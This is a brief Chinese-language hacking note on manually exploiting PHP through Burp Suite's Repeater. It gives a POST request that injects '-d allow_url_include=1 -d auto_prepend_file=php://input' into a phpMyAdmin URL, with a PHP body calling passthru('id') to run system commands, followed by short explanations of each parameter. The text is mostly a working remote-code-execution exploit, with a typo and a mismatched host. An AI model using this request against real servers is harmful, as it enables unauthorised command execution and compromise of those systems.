PHP手工挖洞笔记
工具: Burp Suite
使用Burp中的 重放(Repeater)
POST http://192.168.1.103/phpMyAdmin/?-d+allow_url_include%3d1+-d
+auto_prepend_file%3dphp://input HTTP/1.1
Host: 192.168.20.10
<?php
passthru('id');
die();
?>
POST方式重放数据
- ?-d+allow_url_include%3d1±d
+auto_prepend_file%3dphp://input HTTP/1.1
问号 后面的代码含义:PHP的主配置文件.ini进行修改
allow_url_include: 对服务器上的其它文件进行引用
auto_prepend_file: 附加文件
passthru(‘id’): 括号内为系统操作指令